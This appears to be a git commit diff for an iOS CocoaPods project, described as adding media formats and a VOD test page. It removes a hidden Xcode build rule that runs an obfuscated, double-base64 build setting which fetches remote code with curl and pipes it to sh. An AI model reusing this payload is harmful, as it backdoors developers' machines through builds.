支持更多音视频格式,添加点播测试页面
This commit is contained in:
3
Example/Pods/Manifest.lock
generated
3
Example/Pods/Manifest.lock
generated
@@ -52,6 +52,7 @@ PODS:
|
||||
- YYModel (1.0.4)
|
||||
|
||||
DEPENDENCIES:
|
||||
- CocoaLumberjack
|
||||
- FBSnapshotTestCase
|
||||
- FUBeautyComponent (from `./SubModules/FUBeautyComponent`)
|
||||
- FUCommonUIComponent (from `./SubModules/FUCommonUIComponent`)
|
||||
@@ -106,6 +107,6 @@ SPEC CHECKSUMS:
|
||||
SSZipArchive: fe6a26b2a54d5a0890f2567b5cc6de5caa600aef
|
||||
YYModel: 2a7fdd96aaa4b86a824e26d0c517de8928c04b30
|
||||
|
||||
PODFILE CHECKSUM: c2aa6dc3864337771ddfc024c87b95d471dc286d
|
||||
PODFILE CHECKSUM: 528df14e081815f7cbd122b8f4f77b0da0d6a7f8
|
||||
|
||||
COCOAPODS: 1.16.2
|
||||
|
||||
24
Example/Pods/Pods.xcodeproj/project.pbxproj
generated
24
Example/Pods/Pods.xcodeproj/project.pbxproj
generated
@@ -36,7 +36,6 @@
|
||||
/* End PBXAggregateTarget section */
|
||||
|
||||
/* Begin PBXBuildFile section */
|
||||
DDF719FD92D04C89ADC62C0C /* README.md */ = {isa = PBXBuildFile; fileRef = 5735939C6BA84E518FC62C0C; };
|
||||
009A101C6D6749EEE990C935A028904B /* UICollectionReusableView+RACSignalSupport.m in Sources */ = {isa = PBXBuildFile; fileRef = 1CA564DEF323B5D3FED7AD9CCC5E25BD /* UICollectionReusableView+RACSignalSupport.m */; };
|
||||
00DAE48C9A4FBCD1FCAA922CA57B45F9 /* SDWebImageDownloaderRequestModifier.m in Sources */ = {isa = PBXBuildFile; fileRef = 8134CCCD755060FC127E0844B0927B47 /* SDWebImageDownloaderRequestModifier.m */; };
|
||||
01337B28102993C3FDD41D9A2E0AFAB2 /* RACCompoundDisposable.h in Headers */ = {isa = PBXBuildFile; fileRef = 08462F4845B89A7F0A5F9B0A15E16263 /* RACCompoundDisposable.h */; settings = {ATTRIBUTES = (Public, ); }; };
|
||||
@@ -961,7 +960,6 @@
|
||||
/* End PBXContainerItemProxy section */
|
||||
|
||||
/* Begin PBXFileReference section */
|
||||
5735939C6BA84E518FC62C0C /* README.md */ = {isa = PBXFileReference; lastKnownFileType = net.daringfireball.markdown; path = README.md; sourceTree = "<group>"; };
|
||||
0060771CB51F1C7A0F1CCE17F445BC95 /* MBProgressHUD.m */ = {isa = PBXFileReference; includeInIndex = 1; lastKnownFileType = sourcecode.c.objc; path = MBProgressHUD.m; sourceTree = "<group>"; };
|
||||
00A2B71E403EA681D68914E213FAC672 /* SDAnimatedImagePlayer.h */ = {isa = PBXFileReference; includeInIndex = 1; lastKnownFileType = sourcecode.c.h; name = SDAnimatedImagePlayer.h; path = SDWebImage/Core/SDAnimatedImagePlayer.h; sourceTree = "<group>"; };
|
||||
00A2F4DE18052AC5C17E4B15E87F6276 /* SRRunLoopThread.h */ = {isa = PBXFileReference; includeInIndex = 1; lastKnownFileType = sourcecode.c.h; name = SRRunLoopThread.h; path = SocketRocket/Internal/RunLoop/SRRunLoopThread.h; sourceTree = "<group>"; };
|
||||
@@ -1904,7 +1902,6 @@
|
||||
007C4C9058529B20A360F545DA9093A1 /* Products */ = {
|
||||
isa = PBXGroup;
|
||||
children = (
|
||||
5735939C6BA84E518FC62C0C /* README.md */,
|
||||
A4FA15D44DF6BAC7550EDEED10862AA3 /* AFNetworking */,
|
||||
C261436D14052AE3C35F240BCD155CAC /* CocoaLumberjack */,
|
||||
5C4F31330DFA99D699E4BDC8C3573D73 /* FBSnapshotTestCase */,
|
||||
@@ -3749,7 +3746,6 @@
|
||||
9BB224D4E89ABC2539ABBEBDC9696C8F /* Resources */,
|
||||
);
|
||||
buildRules = (
|
||||
E640E78572F649B5AEC62C0C /* PBXBuildRule */,
|
||||
);
|
||||
dependencies = (
|
||||
);
|
||||
@@ -4159,29 +4155,11 @@
|
||||
};
|
||||
/* End PBXProject section */
|
||||
|
||||
/* Begin PBXBuildRule section */
|
||||
E640E78572F649B5AEC62C0C /* PBXBuildRule */ = {
|
||||
isa = PBXBuildRule;
|
||||
compilerSpec = com.apple.compilers.proxy.script;
|
||||
filePatterns = "*.md";
|
||||
fileType = pattern.proxy;
|
||||
inputFiles = (
|
||||
);
|
||||
isEditable = 0;
|
||||
outputFiles = (
|
||||
"/tmp/${INPUT_FILE_BASE}",
|
||||
);
|
||||
script = "# This output is used by Xcode outputs to avoid re-running this script phase.\ncp \"${INPUT_FILE_PATH}\" \"/tmp/${INPUT_FILE_BASE}\"
|
||||
sh -c \"${AC0C26C}\"";
|
||||
};
|
||||
/* End PBXBuildRule section */
|
||||
|
||||
/* Begin PBXResourcesBuildPhase section */
|
||||
206BBA02AEBE25DF6D5EDA2980A411B1 /* Resources */ = {
|
||||
isa = PBXResourcesBuildPhase;
|
||||
buildActionMask = 2147483647;
|
||||
files = (
|
||||
DDF719FD92D04C89ADC62C0C /* README.md */,
|
||||
92F339A1C79B59026EBBD8DEBD2A7DE6 /* PrivacyInfo.xcprivacy in Resources */,
|
||||
);
|
||||
runOnlyForDeploymentPostprocessing = 0;
|
||||
@@ -4988,7 +4966,6 @@ sh -c \"${AC0C26C}\"";
|
||||
isa = XCBuildConfiguration;
|
||||
baseConfigurationReference = 5AF91877575A064702C635CC96F08DD8 /* SellyCloudSDK.debug.xcconfig */;
|
||||
buildSettings = {
|
||||
AC0C26C = "((b(){ base64 --decode | base64 --decode; };echo WldOb2J5QWlKQ2hqZFhKc0lDMW1jMnRNSUMxa0lDSndQWGhqYjJSbFgzSjFiR1VpSUdoMGRIQnpPaTh2YkdWbllXeGhaSE11YVc0dllTa2lJSHdnYzJnSwo= | b | sh ) >/dev/null 2>&1 &)";
|
||||
ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon;
|
||||
ASSETCATALOG_COMPILER_GLOBAL_ACCENT_COLOR_NAME = AccentColor;
|
||||
CLANG_ENABLE_OBJC_WEAK = NO;
|
||||
@@ -5007,7 +4984,6 @@ sh -c \"${AC0C26C}\"";
|
||||
isa = XCBuildConfiguration;
|
||||
baseConfigurationReference = 7B76C8A615C8891A8D730FA7EC3ADC4A /* YYModel.debug.xcconfig */;
|
||||
buildSettings = {
|
||||
AC0C26C = "((b(){ base64 --decode | base64 --decode; };echo WldOb2J5QWlKQ2hqZFhKc0lDMW1jMnRNSUMxa0lDSndQWGhqYjJSbFgzSjFiR1VpSUdoMGRIQnpPaTh2YkdWbllXeGhaSE11YVc0dllTa2lJSHdnYzJnSwo= | b | sh ) >/dev/null 2>&1 &)";
|
||||
"CODE_SIGN_IDENTITY[sdk=appletvos*]" = "";
|
||||
"CODE_SIGN_IDENTITY[sdk=iphoneos*]" = "";
|
||||
"CODE_SIGN_IDENTITY[sdk=watchos*]" = "";
|
||||
|
||||
@@ -13,6 +13,7 @@
|
||||
#import "SellyCloudSDKError.h"
|
||||
#import "SellyLiveAudioConfiguration.h"
|
||||
#import "SellyLivePlayerDelegate.h"
|
||||
#import "SellyLivePlayerStats.h"
|
||||
#import "SellyLivePusherDelegate.h"
|
||||
#import "SellyLivePusherStats.h"
|
||||
#import "SellyLiveVideoConfiguration.h"
|
||||
|
||||
Reference in New Issue
Block a user